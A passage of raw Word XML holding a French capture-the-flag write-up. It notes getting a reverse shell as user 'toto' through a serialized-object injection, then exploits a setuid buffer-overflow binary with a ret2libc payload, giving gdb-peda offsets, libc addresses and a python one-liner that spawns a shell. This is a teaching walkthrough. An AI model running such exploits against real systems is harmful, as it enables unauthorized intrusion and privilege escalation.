          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>np0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>ncposix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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>n.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Il suffit juste d'ajouter un retour à la ligne '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>n' entre le 1er objet et le 2nd.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Avec notre fonction:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>S(9, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>nncposix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 qui nous retourne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>"V2:e5453d1acd99bdadab0af3b446cae840eb0bd3b7:toto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>np0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>x80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x01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>xe0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>ncposix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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On n’obtient pas d’erreur, nous pouvons tester avec une commande (curl, wget, ...) qui se connecte sur un service écoutant sur notre machine pour confirmer que l’exploit fonctionne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Avec cette méthode nous récupérons un reverse shell sur notre machine et nous pouvons éxectuer des commandes avec les droits ‘toto’. Il est fortement conseillé de récupérer un TTY avec python (pty lib) pour la suite du challenge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On s’apperçoit que l’on a 3 utilisateurs sur le serveur: toto, admin et root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le répertoire courant de l’utilisateur admin est readable et il possède un suid bit (+s) sur un binaire (qui sera donc exécuté avec les droits admin quelque soit l’utilisateur)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vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve">toto@debian:/home/admin$ ls -la vuln flag.txt </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>-rw-r----- 1 admin admin    9 May 14 03:38 flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve">-rwsr-sr-x 1 admin admin 5216 May 14 02:20 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>vuln</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Après désassemblage du binaire on devine que l’on est devant un simple buffer overflow du type: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808000"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>main(...)</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char</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>buf[</w:t>
            </w:r>
            <w:r>
              <w:t>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strcpy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(buf,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>argv</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>]);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Dans un premier temps on va vérifier si l’adressage des adresses est aléatoire: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vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>toto@debian:/home/admin$ ldd ./vuln | grep libc</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>libc.so.6 =&gt; /lib32/libc.so.6 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>0xf7e23000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>toto@debian:/home/admin$ ldd ./vuln | grep libc</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>libc.so.6 =&gt; /lib32/libc.so.6 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>0xf7e23000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>toto@debian:/home/admin$ ldd ./vuln | grep libc</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>libc.so.6 =&gt; /lib32/libc.so.6 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>0xf7e23000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On en conclu que l’ASLR est désactivé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Avec peda pour gdb (installé sur le serveur pour l’occasion) on détermine l’offset pour écraser l’eip:</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color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>gdb-peda$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> pattern arg 150</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Set 1 arguments to program</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>gdb-peda$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>gdb-peda$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t xml:space="preserve"> patts</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>Registers contain pattern buffer:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>ECX+52 found at offset: 69</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>EBP+0 found at offset: 132</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>EIP+0 found at offset: 136</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Notre payload pour réécrire l’eip: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“A” * 136 + ADDR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Après quelques tests, on en déduit que le stack n’est pas éxécutable, on s’oriente alors sur du </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ret2libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Notre nouveau payload: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JUNK + system_addr + exit_addr + sh_addr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unset env LINES </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>(1)</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unset env COLUMNS </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p system</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve">$1 = {&lt;text variable, no debug info&gt;} </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>0xf7e39c50</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;system&gt;</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p exit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve">$2 = {&lt;text variable, no debug info&gt;} </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>0xf7e2d9b0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;exit&gt;</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find "/bin/sh"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Searching for '/bin/sh' in: None ranges</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Found 1 results, display max 1 items:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>libc :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0xf7f5b528</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve"> ("/bin/sh")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>On désactive les variables d’environnenement en trop pour avoir les même adresses dans gdb et en dehors de gdb.</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color w:val="FF0000"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t xml:space="preserve">gdb-peda$ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>r $(python -c 'from struct import pack; print "A"*136 + pack("&lt;I", 0xf7e39c50) + pack("&lt;I", 0xf7e2d9b0) + pack("&lt;I", 0xf7f5b528)')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Starting program: /home/admin/vuln $(python -c 'from struct import pack; print "A"*136 + pack("&lt;I", 0xf7e39c50) + pack("&lt;I", 0xf7e2d9b0) + pack("&lt;I", 0xf7f5b528)')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP�������(��</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>[New process 9971]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>process 9971 is executing new program: /bin/dash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>[New process 9972]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On a notre shell dans gdb, il nous reste plus qu’à lancer notre exploit en dehors de gdb pour obtenir les droits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</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lang w:val="en-US"/>
